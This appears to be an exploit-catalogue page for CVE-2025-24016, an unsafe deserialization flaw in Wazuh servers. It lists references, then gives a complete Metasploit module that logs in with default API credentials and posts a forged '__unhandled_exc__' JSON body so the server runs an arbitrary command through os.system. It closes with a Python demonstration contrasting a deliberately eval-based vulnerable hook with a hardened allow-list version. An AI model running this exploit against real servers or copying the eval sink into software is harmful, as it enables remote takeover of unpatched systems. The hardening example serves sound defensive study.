| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Feb 2025 06:38 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Jul 2025 23:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 2025 18:54 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 16 Feb 2025 11:01 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 2025 21:07 | – | githubexploit |
| CVE-2025-24016 | 10 Feb 2025 00:00 | – | attackerkb |
| CVE-2025-24016 | 10 Feb 2025 17:01 | – | circl |
| Wazuh Server Deserialization of Untrusted Data Vulnerability | 10 Jun 2025 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 10 Jun 2025 12:00 | – | cisa |
| Wazuh code issue vulnerability | 10 Feb 2025 00:00 | – | cnnvd |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wazuh server remote code execution caused by an unsafe deserialization vulnerability',
        'Description' => %q{
          Wazuh is a free and open source platform used for threat prevention, detection, and response.
          Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability
          allows for remote code execution on Wazuh servers. DistributedAPI parameters are serialized
          as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`).
          If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can
          forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code.
          The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh
          servers in the cluster) or, in certain configurations, even by a compromised agent.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module & default password weakness
          'DanielFi https://github.com/DanielFi' # Discovery
        ],
        'References' => [
          ['CVE', '2025-24016'],
          ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
          ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_CMD],
        'Targets' => [
          [
            'Unix/Linux Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-02-10',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 55000
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Path to the wazuh manager', '/']),
      OptString.new('API_USER', [true, 'Wazuh API user', 'wazuh-wui']),
      OptString.new('API_PWD', [true, 'Wazuh API password', 'MyS3cr37P450r.*-'])
    ])
  end

  # Get a Wazuh API token using HTTP basic auth against /security/user/authenticate.
  # Returns the token if the API login is successful, else nil.
  def get_api_token
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate'),
      'headers' => {
        'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
      }
    })
    return unless res&.code == 200 && res.body.include?('token')

    res_json = res.get_json_document
    res_json['data']['token'] unless res_json.blank?
  end

  # Get the Wazuh version from the API root endpoint using the bearer token.
  # Returns the version string if successful, else nil.
  def get_wazuh_version(api_token)
    api_auth = "Bearer #{api_token}"
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'Authorization' => api_auth
      }
    })
    return unless res&.code == 200 && res.body.include?('api_version')

    res_json = res.get_json_document
    res_json['data']['api_version'] unless res_json.blank?
  end

  # CVE-2025-24016: command injection leading to RCE via the unsafe deserialization vulnerability.
  # The JSON body is a forged unhandled exception; the deserializer evaluates `__class__`
  # and calls the result with `__args__`, so `os.system` runs the payload command.
  def execute_payload(cmd, _opts = {})
    # {"__unhandled_exc__":{"__class__": "os.system", "__args__": ["cmd"]}}
    post_data = {
      __unhandled_exc__: {
        __class__: 'os.system',
        __args__: [cmd.to_s]
      }
    }.to_json

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'security', 'user', 'authenticate', 'run_as'),
      'ctype' => 'application/json',
      'headers' => {
        'Authorization' => basic_auth(datastore['API_USER'], datastore['API_PWD'])
      },
      'data' => post_data
    })
  end

  def check
    # Check Wazuh API access with the API credentials.
    api_token = get_api_token
    return CheckCode::Unknown('Can not access the Wazuh API with provided credentials.') if api_token.nil?

    version = get_wazuh_version(api_token)
    return CheckCode::Detected('Can not determine the Wazuh version.') if version.nil?

    # Affected range per the advisory: 4.4.0 <= version < 4.9.1.
    version = Rex::Version.new(version)
    unless version >= Rex::Version.new('4.4.0') && version < Rex::Version.new('4.9.1')
      return CheckCode::Safe("Wazuh version #{version}")
    end

    CheckCode::Appears("Wazuh version #{version}")
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    execute_payload(payload.encoded)
  end
end
```
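The module's description above explains the sink: the JSON `object_hook` sees a dictionary with an `__unhandled_exc__` key, evaluates its `__class__` string as Python and calls the result with `__args__`. The following is an added example, not code from Wazuh or from the Metasploit module: `as_wazuh_object_vulnerable` is a minimal model of just that branch (the real `as_wazuh_object` handles several other keys), and `as_wazuh_object_hardened` shows one way to close it by resolving the class name against a fixed allow-list instead of `eval()`. The function names, the `_ALLOWED_EXCEPTIONS` table and the payloads are this example's own; the payloads use a harmless callable in place of `os.system` so the demonstration runs without side effects.

```python
"""Model of the CVE-2025-24016 deserialization sink beside a hardened hook.

Added example: not Wazuh's code. Only the `__unhandled_exc__` branch the
advisory describes is modelled; the allow-list below is this example's choice,
not Wazuh's fix.
"""
import json
import os  # imported so "os.path.basename" resolves under eval(), as "os.system" would in a module that imports os


def as_wazuh_object_vulnerable(dct):
    """object_hook modelled on the vulnerable branch: eval() the class name, then call it with __args__."""
    if '__unhandled_exc__' in dct:
        exc = dct['__unhandled_exc__']
        # The sink: any Python expression in __class__ is evaluated, and the result is called.
        return eval(exc['__class__'])(*exc['__args__'])
    return dct


# Hypothetical allow-list: the only classes a forged "unhandled exception" may name.
_ALLOWED_EXCEPTIONS = {
    cls.__name__: cls
    for cls in (Exception, ValueError, KeyError, TimeoutError, ConnectionError, RuntimeError)
}


def as_wazuh_object_hardened(dct):
    """Same hook with the sink removed: table lookup by exact name, never eval()."""
    if '__unhandled_exc__' in dct:
        exc = dct['__unhandled_exc__']
        name = exc.get('__class__')
        args = exc.get('__args__', [])
        cls = _ALLOWED_EXCEPTIONS.get(name)
        if cls is None or not isinstance(args, list):
            raise ValueError(f'refusing to deserialize __unhandled_exc__ of class {name!r}')
        return cls(*args)
    return dct


def deserialize(raw, hook):
    """Deserialize a DAPI-style JSON document through the given object_hook."""
    return json.loads(raw, object_hook=hook)


# Constructed payloads in the shape used by the Metasploit module above.
# PAYLOAD_ATTR: dotted attribute path resolved by eval (os.system would sit here).
PAYLOAD_ATTR = json.dumps({'__unhandled_exc__': {'__class__': 'os.path.basename', '__args__': ['/etc/passwd']}})
# PAYLOAD_EXPR: __class__ need not be a name at all; any expression yielding a callable works.
PAYLOAD_EXPR = json.dumps({'__unhandled_exc__': {'__class__': "(lambda cmd: 'would run: ' + cmd)", '__args__': ['id']}})
# PAYLOAD_BENIGN: what a legitimate forwarded exception looks like.
PAYLOAD_BENIGN = json.dumps({'__unhandled_exc__': {'__class__': 'KeyError', '__args__': ['agent_id']}})


def demo():
    """Run both hooks over the constructed payloads and return what each produced."""
    results = {}
    results['vuln_attr'] = deserialize(PAYLOAD_ATTR, as_wazuh_object_vulnerable)
    results['vuln_expr'] = deserialize(PAYLOAD_EXPR, as_wazuh_object_vulnerable)
    benign = deserialize(PAYLOAD_BENIGN, as_wazuh_object_hardened)
    results['hardened_benign'] = (type(benign).__name__, benign.args)
    try:
        deserialize(PAYLOAD_ATTR, as_wazuh_object_hardened)
        results['hardened_attr'] = 'accepted'
    except ValueError:
        results['hardened_attr'] = 'rejected'
    return results


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

The vulnerable hook turns `os.path.basename` into a call it was never meant to make, and the lambda payload shows why filtering on "looks like a class name" is not enough: `__class__` is an arbitrary expression. The hardened hook accepts only an exact key of a fixed table and rejects everything else before any call happens, which is the property a deserializer for attacker-reachable input needs.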